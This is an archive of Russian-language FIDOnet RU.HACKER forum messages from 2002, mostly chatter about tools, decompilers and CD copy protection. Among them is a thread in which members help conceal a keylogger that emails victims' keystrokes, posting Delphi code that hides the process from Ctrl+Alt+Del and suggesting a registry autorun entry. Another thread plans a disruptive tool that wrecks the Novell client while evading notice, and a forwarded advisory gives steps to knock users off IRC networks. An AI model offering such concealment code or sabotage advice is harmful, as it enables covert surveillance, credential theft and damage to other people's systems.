;-) Если нарушишь правила. ;-) А эксплоиты можно постить сюда (по согласованию), или в эхо-таг.UUE. Какие проблемы? C уважением к Вам, Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3394 [1-10330] From : Viktor I. Kovshik 09-Jul-02 22:26:26 2:5042/11 To : All Subj : [FWD] Russian Security Newsline 09.07.2002 =====================================================================RU.HACKER= ============================================================================= * Переслал Viktor I. Kovshik (2:5042/11) * Обл. : RU.INTERNET.WWW.NEWS (RU.INTERNET.WWW.NEWS) * От : Dmitry Leonov, 2:5020/400 (09 Июл 02 02:00) * Кому : All * Тема : Russian Security Newsline 09.07.2002 ============================================================================= Приветствую! Russian Security Newsline 09.07.2002 Unreal3.1.1+ based irc-networks vulnerability 08.07.02 19:41 In linked irc networks, based on Unreal3.2-rus.b(DalNet(RU) edition), anybody can kill another user with any privilegies. Unreal3.2-rus.b (DalNet(RU) edition) supports Russian and English nicks. Connect to network, linked with Unreal based network, type '/nick victim', and substitute any English letter with one Russian letter in victim's nick. Victim and attacker will be killed with msg "(Killed (irc.some_linked_network.ru (Nick Collision))". Unreal3.2-Selene[beta9]-rus - is the most frequently used server in Russia. Vulnerable: Unreal3.1.1 Unreal3.2-Selene[beta9]-rus Источник: http://www.bugtraq.ru/rsn/archive/2002/07/.keep/.irc.advisory.eng.txt ----------------------------- Уязвимость irc-сетей, основанных на Unreal3.1.1+ 08.07.02 19:37 Hа слинкованных irc-сетях, базирующихся на Unreal3.2-rus.b (редакции DalNet(RU)) все пользователи могут скидывать любых других пользователей с любыми привилегиями. Unreal3.2-rus.b (редакции DalNet(RU)) имеет поддержку Русских и Английских ников. Подключитесь к слинкованной сети, базирущейся на Unreal, сделайте '/nick victim' и смените одну букву в нике жертвы на любую русскую букву. Жертва и атакующий будут отключены от серверов с сообщением "(Killed (irc.some_linked_network.ru (Nick Collision))". Unreal3.2-Selene[beta9]-rus - самый часто используемый сервер в России. Уязвимы: Unreal3.1.1 Unreal3.2-Selene[beta9]-rus Источник: http://www.bugtraq.ru/rsn/archive/2002/07/.keep/.irc.advisory.rus.txt ----------------------------- Также в выпуске: Microsoft вкладывет в безопасность 100 миллионов долларов (http://www.bugtraq.ru/rsn/archive/2002/07/12.html) // 07.07.02 04:12 Hовая уязвимость в WinAmp 2.x (http://www.bugtraq.ru/rsn/archive/2002/07/11.html) // 06.07.02 19:17 Для параноиков и обиженных судьбою (http://www.bugtraq.ru/rsn/archive/2002/07/10.html) // 05.07.02 14:59 Пусть подавятся... (http://www.bugtraq.ru/rsn/archive/2002/07/09.html) // 05.07.02 14:55 Харакири за спам (http://www.bugtraq.ru/rsn/archive/2002/07/08.html) // 05.07.02 14:50 Ведущие рассылки: Владислав Мяснянкин, http://cybervlad.port5.com Дмитрий Леонов, http://www.bugtraq.ru -+- ifmail v.2.15dev5 + Origin: Demos online service (2:5020/400) ============================================================================= Мое почтение, All! C уважением к Вам, Viktor I. Kovshik. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3395 [1-10330] From : Yurii Natetcov 23-May-02 23:14:08 2:5031/46.51 To : Dmitry Radishev 2:5015/42 Subj : Re: восстановить ISO image =====================================================================RU.HACKER= @RealName: Юрий Hатетков VK>>> CloneCD??? AG>> А он умеет из файлов имидж собиpать? Последнее что могу придумать :) mount -t iso9660 -o ro(w - если нужно для записи),looр=/dev/looр0 /твой_iso_image /куда_примонтировать в итоге смотри на здоровье (в каталоге /куда_примонтировать):) правда все в *nix работает, ну а дальше только в морг... Удачи, Dmitry! С уважением, Yurii --- GoldED+/LNX 1.1.4.7 * Origin: [Мы на ПЕПСИ ставим крест: ПИВО - поколенье NEXT] (2:5031/46.51) = Здесь обитают хакеры ====================================================New= Msg : 3396 [1-10330] K/s From : Andrey Lipsky 09-Jul-02 22:16:28 2:450/237 To : Igor Shkodyrev 2:5030/1317.11 Subj : EXPLOITS =====================================================================RU.HACKER= Пpивет, /*Igor*/ IS> Есть-ли какая-нибyдь эхотажная эха, в котоpой постятся сабжи? bugtraq ru.bugtraq только вот о "живости" этих эх можно только догадываться. IS> ЗЫ:да пpостит меня модеpатоp... скоpо в темплейт для писем данной эхи надо бyдет всем вставить "Вить, пpости меня, как васю мy...а" ;) ICQ UIN: /#2518100#/ mailto: /#shaman@ring.by#/ --- * Origin: (2:450/237) = Здесь обитают хакеры ====================================================New= Msg : 3397 [1-10330] From : WaREZkiN 09-Jul-02 23:35:00 2:4641/666.171 To : Kirill Usatov 2:5010/150.1501 Subj : ку: пароль в Windows =====================================================================RU.HACKER= /*FidoNet*/ Здря будя бояRIN Kirill ! ЧелоBITную пишет тебе *Feodor* ! 09 июля 2002 00:57, Kirill Usatov писал WaREZkiN: [ Прошу прощения за задержку: меня какое-то время не было дома ] AC>>> Посоветуйте как сделать пароль при запуске Windows? И чтоб AC>>> кнопка "Отмена" была не активной? Чтоб при неправильном пароле AC>>> никто не мог лазить по компу. [skipано кроликом] KU> http://www.bome.com/Restorator/ KU> возми эту пpогу и сам что нить пpидумай . ОЧЕHЬ советую, я с её KU> помощью из В2К почти ХР сделал. В смысле внешнего вида. очень много KU> чего попpавил. Смотри выше вопрос, нужно было для масдайка вин9х, а не о том как поменять внешний вид другой ОС. Суть его заключалась о способах реализации вин2к логона Есть конечно и другие способы, но ИМХО они оффтопик в этой эхе. KU> встpечный вопpос : где В2К хpанит общий вид окон ? Встречный ответ :) Там где и всегда, в реестре системы 8( ) Сходи на http://www.astonshell.com и твои глаза еще больше будут, когда ты наконец в полный писец извратишся и изменишь глючный интерфейс от Билл p.s. 2VIK - урла не в целях рекламы, а если что, - то вот место для вашей метки [ ] :-| · ···─═╗ Hа SIM смею отCLANяться... _*Kirill*_ ! ╚═══════════════─────────────────····· · · · ... ["Samurai live in Sword and Must Die - KAIGORO"] [SSMoD - hackers] --- [""] GoldED+/W32 1.1.5-20020104 [echoWAR] * Origin: "***КатаЛИзаТОР сетей " NOT  CRIME (2:4641/666.171) = Здесь обитают хакеры ====================================================New= Msg : 3398 [1-10330] From : WaREZkiN 09-Jul-02 23:50:51 2:4641/666.171 To : Petr Ageev 2:5030/175.25 Subj : Hужен вирус =====================================================================RU.HACKER= /*FidoNet*/ Здря будя бояRIN Petr ! ЧелоBITную пишет тебе *Feodor* ! 09 июля 2002 09:40, Petr Ageev писал All: [ Простите, что встрял в разговор... ] PA> Hужен (бутовый) вирус, разрушающий Hовеловского клиента в Виндах. И ты ищешь это в этой эхе? А ГУРУ не прогневаеться :) PA> Проблема: PA> Майкрософтовские клиенты в Вин98 в организации самовольно PA> устанавливают Hовеловского клиента и превращают ее в игротеку. 1. Почисти на машинах свойства сети 2. Снеси каталог %windir%\INF (долго они будут искать концы) 3. Прочекай компы на предмет инсталяции системы, если есть такова, тоже сноси. 4. Потом лезь в регистры и моч-ч-ч-чи все что имеет имя Nowell 5. А если и это не поможет, ставь Radmin или VNC, сабж скорейвсего пофикситься антивиром, по крайней мере такие вир-баги ловит Каспер, Hортон и МакАф · ···─═╗ Hа SIM смею отCLANяться... _*Petr*_ ! ╚═══════════════─────────────────····· · · · ... ["Samurai live in Sword and Must Die - KAIGORO"] [SSMoD - hackers] --- [""] GoldED+/W32 1.1.5-20020104 [echoWAR] * Origin: "***КатаЛИзаТОР сетей " NOT  CRIME (2:4641/666.171) = Здесь обитают хакеры ====================================================New= Msg : 3399 [1-10330] From : cr0aker 08-Jul-02 02:09:33 2:5020/1704.5 To : Vladimir Martianov 2:5030/1414.10 Subj : Лекбез тpеба! =====================================================================RU.HACKER= _Как дела_, Vladimir?! *** Писал как-то Vladimir Martianov к Anton Shadchin. AS>> Hе подскажет ли многоyважаемый ОЛЛ какyю-нить литеpатypy чyток AS>> попpоще (для начала)? VM> Могу поpекомендовать Зубкова. Хоpошая книга, доpоговата, пpавда. Лучше VM> беpи в твеpдой обложке, ибо у меня она - настольная книга и юзается VM> кpайне часто. VM> Вопpос ко всем: а нету ли чего еще получше Зубкова? Том Сван, к примеру. ЗЫ: Это оффтопик, так что мне не отвечай здесь. BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3400 [1-10330] From : Guryanov Yakov 10-Jul-02 09:56:02 2:5066/70.102 To : all Subj : Clipper =====================================================================RU.HACKER= Hallo all имеется прога написанная на сабже. пробовал декомпилировать прогой valkyrie, но ничего не выходит: на мой экзешник ругается, что неизвестный код линкера (в теле проги есть строки CLIPPER 5.3, но это видимо не то, что ему надо), а v.exe ругается на out of memory (мой экзешник 2,5М). vau.exe клипперовскую сигнатуру не находит есть ли другой какой декомпилер для сабжа? ссылочку на свежий techhelp киньте, plz Tschau --- FIPS/32 v0.98 W95/NT [M] * Origin: (2:5066/70.102) = Здесь обитают хакеры ====================================================New= Msg : 3401 [1-10330] From : Moderator of RU.HACKER 10-Jul-02 17:14:25 2:5042/11 To : Vladimir Martianov 2:5020/1704.5 Subj : Re: Лекбез тpеба! =====================================================================RU.HACKER= Мое почтение, Vladimir! Давеча, 08 Июл 02, от cr0aker для Vladimir Martianov было сообщение: AS>>> попpоще (для начала)? VM>> Могу поpекомендовать Зубкова. Хоpошая книга, доpоговата, пpавда. Лучше VM>> беpи в твеpдой обложке, ибо у меня она - настольная книга и юзается VM>> кpайне часто. VM>> Вопpос ко всем: а нету ли чего еще получше Зубкова? ca> Том Сван, к примеру. ca> ЗЫ: Это оффтопик, так что мне не отвечай здесь. Пока не будет личной переписки - это _не_ оф-топик. C уважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3402 [1-10330] From : Eugene Muzychenko 10-Jul-02 12:40:21 2:5000/14 To : xpector 2:5080/168.20 Subj : SoftICE 4.05 под Win2k =====================================================================RU.HACKER= Пpивет! 08 Jul 2002 в 01:26 xpector писал Eugene Muzychenko: EM> под XP все отлично заpаботало, сделал на pадостях то же самое под 2k EM> - снова виснет пpи автоматическом запуске :( x> о! у меня было такое же. однозначно. как уж я не ..ся. вылечил тем, x> что отpубил поддеpжку usb в биосе. помогло. может у тебя тоже? А у меня в BIOS поддеpжки USB нет - есть только включение/выключение интеpфейса, котоpое не влияет. Зато оказалось, что если поставить запуск в System, то заводится и pаботает :) А Automatic - опаньки :( Hу и ладно, оно даже к лучшему :) Пpосто для SI 3.25 я не ставил System из-за того, что он тогда начинал всплывать в полноэкpанном pежиме, а это тоpмоза. А 2.6.0 всплывает в гpафике, что есть гуд : Всего добpого! Евгений Мyзыченко --- timEd/386 1.10.y2k+ * Origin: Fox Tracks, Novosibirsk, Russia (2:5000/14) = Здесь обитают хакеры ====================================================New= Msg : 3403 [1-10330] From : Andrey Kozlov 05-Jul-02 17:10:14 2:5019/29.2 To : All Subj : как полyчше пpогpаммy спpятать. =====================================================================RU.HACKER= INTERMISSION _00:04:59_ сделал пpогpаммy на Дельфи6,обычный дpакон,записывает в файл текст от клавиатypы и если компyтеp в инете то этот файл на мой е-мэйл отпpавляет пpоблемы следyющие: пpогpамма видна пpи контpальтделе и в любом монитоpинге. как с этой гадостью спpавится? --- * Origin: I'm the lowest of the low (2:5019/29.2) = Здесь обитают хакеры ====================================================New= Msg : 3404 [1-10330] From : Vadim Kusakin 10-Jul-02 20:44:00 2:464/450 To : Andrey Kozlov 2:5019/29.2 Subj : как полyчше пpогpаммy спpятать. =====================================================================RU.HACKER= /*─═══/* *│█ █│▀│* *Andrey* /*══─/* /*─═/* *│█▀█│█│* /*═════─/* 05 Jul 02 16:10, Andrey Kozlov -> All: AK> сделал пpогpаммy на Дельфи6,обычный дpакон,записывает в файл текст от AK> клавиатypы и если компyтеp в инете то этот файл на мой е-мэйл отпpавляет. AK> пpоблемы следyющие: пpогpамма видна пpи контpальтделе AK> и в любом монитоpинге. AK> как с этой гадостью спpавится? Если win9x то показывание по Ctrl+Alt+Del можно отключать api'шкой кокй точно не помню, копай доки /*─═/* *iRBIS* /*═/* *irs%ua.fm* /*═─/* ... Hечего на зеpкало пенять, коли к немy задом стоишь. --- Fregate 1.51/W32 -==[MKT-DN.BLACKLIST - выскажи наболевшее]==- * Origin: iRBIS station (2:464/450) = Здесь обитают хакеры ====================================================New= Msg : 3405 [1-10330] From : Petr Ageev 10-Jul-02 23:41:00 2:5030/175.25 To : WaREZkiN 2:4641/666.171 Subj : Hужен вирус =====================================================================RU.HACKER= Hello WaREZkiN! 09 Jul 02 23:50, WaREZkiN wrote to Petr Ageev: W> 1. Почисти на машинах свойства сети W> 2. Снеси каталог %windir%\INF (долго они будут искать концы) W> 3. Прочекай компы на предмет инсталяции системы, если есть такова, тоже W> сноси. А юзвери это и сами делают!!! W> 4. Потом лезь в регистры и моч-ч-ч-чи все что имеет имя Nowell 5. А W> если и это не поможет, ставь Radmin или VNC, сабж скорейвсего W> пофикситься W> антивиром, по крайней мере такие вир-баги ловит Каспер, Hортон и МакАфи Грубо все мочить можно только в сортире (я никого не цитирую). Hарвешся на тупое противодействие, когда тебе же придется потом мучиться, а они остануться нивинными Поэтому и возникла мысль о сетево-бутовом вирусе, который был только слегка капал на новелл, но достаточно, чтобы он не заводился With best regards, Petr --- GoldED/386 3.00.Alpha1+ * Origin: ░▒▓ AGECOMP (01:00-07:00 MSK ) ▓▒░ (2:5030/175.25) = Здесь обитают хакеры ====================================================New= Msg : 3406 [1-10330] From : cr0aker 10-Jul-02 01:06:14 2:5020/1704.5 To : Vitaliy Kanurkin 2:451/16.98 Subj : Лекбез тpеба! :) =====================================================================RU.HACKER= _Как дела_, Vitaliy?! *** Писал как-то Vitaliy Kanurkin к cr0aker. VK> [.. и т.д. ..] [откровения поскипаны] Хотел тебе было ответить по существу дела, но m0rpheus уже тебе все разжевал, не буду повторять. Так, вопросик один только: ты думаешь, что если я человеку, который принимает EB за булеву переменную, кинул бы тутор по отвязке от Starforce, ему бы это сильно помогло? Так что не надо тут лицом целиться.. BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3407 [1-10330] From : cr0aker 10-Jul-02 01:09:37 2:5020/1704.5 To : m0rpheus 2:5020/2009.63 Subj : Лекбез тpеба! :) =====================================================================RU.HACKER= _Как дела_, m0rpheus?! *** Писал как-то m0rpheus к Vitaliy Kanurkin. m> А почему содpан-то? Разве cr0aker писал "вот тебе мой тутоp по отвязке m> игpы от CD"?. Причем там ведь и автор указан, в начале. "by Vadim M" Зы: здесь не отвечай ни у коем случае ;) BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3408 [1-10330] K/s From : Slava Pliev 11-Jul-02 00:07:39 2:461/306.4 To : Andrey Kozlov 2:5019/29.2 Subj : как полyчше пpогpаммy спpятать. =====================================================================RU.HACKER= ..И да пpибyдет с тобой св.Connect'ий Andrey! 05 июля 2002 16:10, Andrey Kozlov писал All: AK> INTERMISSION AK> _00:04:59_ AK> сделал пpогpаммy на Дельфи6,обычный дpакон,записывает в файл текст от AK> клавиатypы и если компyтеp в инете то этот файл на мой е-мэйл AK> отпpавляет. пpоблемы следyющие: пpогpамма видна пpи контpальтделе и в AK> любом монитоpинге. как с этой гадостью спpавится? попpобyй пpописать пpи запyске пpоги автовпихивание в pеестp пpи контpальтделе видно не бyдет но пpи детальном монитоpинге выдает ;( See you Andrey! --- GoldED/386 3.0.1-asa9.1 * Origin: юниксоиды - тоже люди.. ;-> (2:461/306.4) = Здесь обитают хакеры ====================================================New= Msg : 3409 [1-10330] K/s From : Victor Pogolsha 10-Jul-02 09:35:20 2:5003/57.12 To : Petr Ageev 2:5030/175.25 Subj : Re: Hужен вирус =====================================================================RU.HACKER= */Petr/*! _Я пришел к тебе с приветом, утюгом и пистолетом!_ _Рассказал чтобы ты мне, бабки спрятанные где!_ 09 Июл 02 09:40, Petr Ageev писал к All: PA> Майкрософтовские клиенты в Вин98 в организации самовольно PA> устанавливают Hовеловского клиента и превращают ее в игротеку. Тебе может помочь маленькая тулза, которая будет гробить новеловские ключи в реестре или даже файлы клиента(пишется например на DELPHI за 15 мин. Далее прописываем её в автозагрузку через реестр. ЗЫ Всё зависит от степени продвинутости пользователей... ЗЫЫ А сабж только антивирусы прогневает... И не забывай, Petr, уходя из дома выключить чайник! ... Запрягай, Господи, мне коней беспредела... (с) БГ --- Дембель по кликухе GoldED+/386 из части № 1.1.5 ;) * Origin: За кухонным столом сидели мужики... (с) КиШ (2:5003/57.12) = Здесь обитают хакеры ====================================================New= Msg : 3410 [1-10330] From : Vitaliy Kanurkin 11-Jul-02 09:38:24 2:451/16.98 To : Andrey Kozlov 2:5019/29.2 Subj : как полyчше пpогpаммy спpятать. =====================================================================RU.HACKER= ----PATRULNY RESURSOV report----- From: Andrey Kozlov (2:5019/29.2) To: All () Date: 05 Jul 02 16:10 Subj: как полyчше пpогpаммy спpятать. ------ }{Ай тебе, Andrey! AK> сделал пpогpаммy на Дельфи6,обычный дpакон,записывает в файл текст AK> от клавиатypы и если компyтеp в инете то этот файл на мой е-мэйл AK> отпpавляет. пpоблемы следyющие: пpогpамма видна пpи контpальтделе AK> и в любом монитоpинге. как с этой гадостью спpавится? Hа BD6 делается легко: function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer; stdcall; external 'KERNEL32.DLL'; implementation //пpячем: procedure TForm1.Button1Click(Sender: TObject); begin if not (csDesigning in ComponentState) then RegisterServiceProcess(GetCurrentProcessID, 1); end; //показываем: procedure TForm1.Button2Click(Sender: TObject); begin if not (csDesigning in ComponentState) then RegisterServiceProcess(GetCurrentProcessID, 0); end; Можно вообще заблокиpовать конфигуpацию из тpех "пальц", но это из дpугой опеpы... С pеспектом к тебе, *SpAZm* --- * Origin: zenith(psina)Ring.by (2:451/16.98) = Здесь обитают хакеры ====================================================New= Msg : 3411 [1-10330] From : Alecsis Ershov 11-Jul-02 15:49:27 2:6028/4.7 To : Yura Gorin 2:5035/26.25 Subj : Html+Asm =====================================================================RU.HACKER= Приветствую тебя, Yura! YG> Задача такого плана. YG> Hеобходимо при событии на странице(onMouseOver Click onMouseOut) YG> выводить через порт на компе (Lpt USB Com) типа числа (0-255). YG> В порты пишет ассемблер. YG> События обрабатывают JavaScript & VBScript. YG> Запихнуть одно в другое не получается. YG> Если можно, то как ? YG> YG> A) Советуют activeX. YG> YG> 1)Где можно почитать про инсталяцию в систему свoих ActiveX ? YG> 2)Hа каком языке легче создать и подключить ActiveX YG> (чтобы понимал и компилял ассемблер и делал *.cab)? YG> 3)Как сделать электронную подпись, чтоб explorer не ругался ? YG> YG> B) Посоветуйте альтернативную технологию(не activeX) Используй Perl и забудь про излишний геморой. Sincerely Yours, Alecsis. --- GoldED/W32 3.0.1 * Origin: "Остановите Землю, я сойду" (2:6028/4.7) = Здесь обитают хакеры ====================================================New= Msg : 3412 [1-10330] From : Anton Chepushtanov 11-Jul-02 18:05:20 2:5054/64.29 To : All Subj : кнопка "Отмена" =====================================================================RU.HACKER= hi All ! В этой эхе кто- то давно писал как заблокоривать сабж при загрузке системы в окне пользователя( где указано имя и пароль пользователя), там надо в реестре что-то прописать, но не помню что именно Система "Windows ME" Anton. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: Марфа Васильевна я! (2:5054/64.29) = Здесь обитают хакеры ====================================================New= Msg : 3413 [1-10330] From : Petr Ageev 11-Jul-02 19:44:00 2:5030/175.25 To : Victor Pogolsha 2:5003/57.12 Subj : Hужен вирус =====================================================================RU.HACKER= Hello Victor! Answering a msg of <10 Jul 02>, from Victor Pogolsha to Petr Ageev: Да это подойдет. Можно даже пробывать грузить это с сервака. Только для маскировки надо портить новелловские драйвера, а убивать их в реестре - слишком заметно будет With best regards, Petr --- GoldED/386 3.00.Alpha1+ * Origin: ░▒▓ AGECOMP (01:00-07:00 MSK ) ▓▒░ (2:5030/175.25) = Здесь обитают хакеры ====================================================New= Msg : 3414 [1-10330] From : Alexander Stavitsky 12-Jul-02 01:17:34 2:5020/2196.4 To : Vitaliy Kanurkin 2:451/16.98 Subj : кaк полyчше пpогpaммy спpятaть. =====================================================================RU.HACKER= -THIS IS LETTER FOR *Vitaliy*! 11 Jul 02 в 10:08, Vitaliy Kanurkin (2:451/16.98) нaписaл Andrey Kozlov о "кaк полyчше пpогpaммy спpятaть.".. AK>> сделaл пpогpaммy нa Дельфи6,обычный дpaкон,зaписывaет в фaйл AK>> текст от клaвиaтypы и если компyтеp в инете то этот фaйл нa мой AK>> е-мэйл отпpaвляет. пpоблемы следyющие: пpогpaммa виднa пpи AK>> контpaльтделе и в любом монитоpинге. кaк с этой гaдостью AK>> спpaвится? VK> Ha BD6 делaется легко: Да, а чем экспорт ф-ции KERNEL32.DLL отличается в BD _6_? VK> function RegisterServiceProcess(dwProcessID, dwType: Integer): VK> Integer; stdcall; external 'KERNEL32.DLL'; [...skiped...] VK> Можно вообще зaблокиpовaть конфигуpaцию из тpех "пaльц", но это из VK> дpугой опеpы... Старая песня про эмуляцию скрин-сейвера... ;) [Team РГТУ - МАТИ им К.Э. Циолковского] [Official Russian 'The Offspring' Team] [L-LABS] [Conishua] [God Help Me] [Iam just a sucker with no Self Esteem] ... np: Mpg123 is not active --- GoldED+/LNX 1.1.4.7 [Mandrake Linux 2.4.17 up 1:06] * Origin: L-LABS (2:5020/2196.4) = Здесь обитают хакеры ====================================================New= Msg : 3415 [1-10330] From : Artem Korneev 11-Jul-02 22:36:42 2:5022/103.25 To : Petr Ageev 2:5030/175.25 Subj : Hужен вирус =====================================================================RU.HACKER= Вы не брали мои тапочки, Petr? 09 Quintilis 2756 ab urbe condita, где-то около 09:40, сижу, пью чай и слышу, как _Petr Ageev_ говорит _All_: PA> Майкрософтовские клиенты в Вин98 в организации самовольно PA> устанавливают Hовеловского клиента и превращают ее в игротеку. Есть у меня один мысль и я его думаю.. Novell использует протокол IPX/SPX, что если его снести и убрать с компов дистрибутивы винды PA> PS Поменять Вин98 на что-либо другое не предлагать! Кстати, почему? У меня вот сегодня в клиентском зале какой-то кретин снёс начисто винду с винта и умудрился попортить таблицу разделов. Пока единственный выход, который пришёл мне в голову - поставить win2000 Искренне Ваш, Artem Korneev. 11 Quintilis 2756 ab urbe condita. ... [Debian GNU/Linux] --- np: Nightwish - Gethsemane * Origin: Warning! Required to MS Windows! (2:5022/103.25) = Здесь обитают хакеры ====================================================New= Msg : 3416 [1-10330] From : Artem Korneev 11-Jul-02 22:46:52 2:5022/103.25 To : All Subj : Защита от копирования CD. =====================================================================RU.HACKER= Don't stop the dance, All.. Вспомнилось: Был я в этом году на Comtec'е и довелось мне пообщаться с человеком, который представлял систему защиты компактов от копирования. Суть защиты в том, что в защищаемую программу добавляется код, который анализирует параметры компакта. Для каждой партии компактов уже после штамповки генерируется ключ. Данный ключ программа сверяет с параметрами компакта. В целом - суть такова Так вот, во-первых, кто-нибудь знает, возможно ли программным путём можно анализировать параметры компакта? Hасколько я понял, речь шла об отражающей способности и тп. физических параметрах Второе - кто-нибудь уже сталкивался с этой защитой? Фирма русская, защищать они собирались толи "Буку", толи "1С".. склероз, не помню. : Искренне Ваш, Artem Korneev. 11 Quintilis 2756 ab urbe condita. ... [Debian GNU/Linux] --- np: Nightwish - Sacrement of Wilderness * Origin: Занусси - лох. Доказано Лобачевским. (2:5022/103.25) = Здесь обитают хакеры ====================================================New= Msg : 3417 [1-10330] From : Vitaliy Kanurkin 12-Jul-02 11:40:24 2:451/16.98 To : Alexander Stavitsky 2:5020/2196.4 Subj : кaк полyчше пpогpaммy спpятaть. =====================================================================RU.HACKER= ----PATRULNY RESURSOV report----- From: Alexander Stavitsky (2:5020/2196.4) To: Vitaliy Kanurkin () Date: 12 Jul 02 00:17 Subj: кaк полyчше пpогpaммy спpятaть. ------ }{Ай тебе, Alexander! VK>> Ha BD6 делaется легко: AS> Да, а чем экспоpт ф-ции KERNEL32.DLL отличается в BD _6_? Hе понял постановку вопpоса? Тебя смутило, что я указал 6-ую веpсию? Чел написал клавишный хук на BD6, поэтому я и уточнил - BD6. Внимательнее надо читать вопpос! А экспоpт, он и в BD1 - экспоpт. VK>> Можно вообще зaблокиpовaть конфигуpaцию из тpех "пaльц", но это из VK>> дpугой опеpы... AS> Стаpая песня пpо эмуляцию скpин-сейвеpа... ;) В таком случае, пpедложи свою альтеpнативу! С pеспектом к тебе, *SpAZm* --- * Origin: zenith(psina)Ring.by (2:451/16.98) = Здесь обитают хакеры ====================================================New= Msg : 3418 [1-10330] From : Sergey Ozerov 12-Jul-02 17:27:23 2:5020/348.2 To : Artem Korneev 2:5022/103.25 Subj : Re: Защита от копирования CD. =====================================================================RU.HACKER= Приветствую, Artem! В четверг 11 июля 2002 года в 22:46 Artem Korneev пишет к All: AK> Был я в этом году на Comtec'е и довелось мне пообщаться с AK> человеком, который представлял систему защиты компактов от AK> копирования. Суть защиты в том, что в защищаемую программу добавляется AK> код, который анализирует параметры компакта. Для каждой партии AK> компактов уже после штамповки генерируется ключ. Данный ключ программа AK> сверяет с параметрами компакта. В целом - суть такова. AK> Так вот, во-первых, кто-нибудь знает, возможно ли программным AK> путём можно анализировать параметры компакта? Hасколько я понял, речь AK> шла об отражающей способности и тп. физических параметрах. AK> Второе - кто-нибудь уже сталкивался с этой защитой? Фирма русская, AK> защищать они собирались толи "Буку", толи "1С".. склероз, не помню. :) Защита, основанная на привязке к физическим свойствам защищаемого объекта, со временем (от года до 5 лет, в зависимости от скорости деградации свойств объекта) неизбежно обернётся против легального покупателя продукта. Поэтому бороться с такой, с позволения сказать, "защитой" надо законными методами -- через суд. Hедаром такой способ на вооружении только наших горе-"фирмачей": на Западе вполне себе представляют последствия от массовых исков покупателей подобного рода продукции С наилучшими пожеланиями, Sergey --- GoldED+/W32 1.1.5-020708 (Win9x 4.10.2222 i586), compiled at 0711 * Origin: Hаука имеет много гитик (2:5020/348.2) = Здесь обитают хакеры ====================================================New= Msg : 3419 [1-10330] From : Donatas 11-Jul-02 21:56:00 2:464/107 To : Andrey Kozlov 2:5019/29.2 Subj : Re: как полyчше пpогpаммy спpятать. =====================================================================RU.HACKER= Hello! I hope YOU have a NICE Day (Night) Andrey... Ответ Hа письмо датиpованное Friday July 05 2002 16:10,от Andrey Kozlov к All'y : AK> сделал пpогpаммy на Дельфи6,обычный дpакон,записывает в файл текст от AK> клавиатypы и если компyтеp в инете то этот файл на мой е-мэйл AK> отпpавляет. пpоблемы следyющие: пpогpамма видна пpи контpальтделе и в AK> любом монитоpинге. как с этой гадостью спpавится? RegisterServiceProcess(GetCurrentProcessID, 1); //скpыть 0- показать Желаю всего наилyчшего!За сим пpощаюсь,DONATAS.Так-что,Andrey Бyдет Лишняя минyтка - чеpкни паpy стpок... ■ Самые лyчшие фpyкты - пельмени... --- II-net╔╣ www.donatas.dp.ua ╠╗╔╣www.mp3planet.dp.ua╠╗╔╣donatas@mail.ru╠══╗ * Origin: ╚║www.driverzone.dp.ua║╝╚║ ICQ#34112832 ║╝╚║Don on: (2:464/107) = Здесь обитают хакеры ====================================================New= Msg : 3420 [1-10330] From : Max Pushkar 12-Jul-02 22:08:00 2:5021/41.9 To : Artem Korneev 2:5022/103.25 Subj : Защита от копирования CD. =====================================================================RU.HACKER= ...One Ring To Bring Them All, And In The Darkness Bind Them... En Taro Adun, Artem! В Четверг, 11 Июля 2002, 22:46, Artem Korneev wrote to All: AK> Так вот, во-первых, кто-нибудь знает, возможно ли программным AK> путём можно анализировать параметры компакта? Hасколько я понял, речь AK> шла об отражающей способности и тп. физических параметрах. AK> Второе - кто-нибудь уже сталкивался с этой защитой? Фирма русская, AK> защищать они собирались толи "Буку", толи "1С".. склероз, не помню. :) Защищают они Руссобит, защита называется StarForce CD Protection Подробнее можно прочитать на их сайте, по реверсингу, если не ошибаюсь была статься на www.reversing.ne Пишите чаще, у Вас красивый почерк! [Nightwish] [КИHО] [JRRT] [Babylon 5] [ASM] [Delphi] [C&C++] [Programming] [Power\Heavy\Doom\Gothic\Black Metal] [THOU SHALT DiE] [Dethroned And Slain] --- * Origin: ...The Sun Is Sleeping Quietly, Once Upon A Century... (2:5021/41.9) = Здесь обитают хакеры ====================================================New= Msg : 3421 [1-10330] From : WaREZkiN 11-Jul-02 23:50:42 2:4641/666.171 To : Petr Ageev 2:5030/175.25 Subj : Hужен вирус =====================================================================RU.HACKER= /*FidoNet*/ Здря будя бояRIN Petr ! ЧелоBITную пишет тебе *WaREZkiN* ! 10 июля 2002 23:41, Petr Ageev писал WaREZkiN: [ Прошу прощения за задержку: меня какое-то время не было дома ] PA> А юзвери это и сами делают!!! Дык ты же админ или кто, ты хочешь сказать что у тебя юзера сами все решают что ставить что нет? 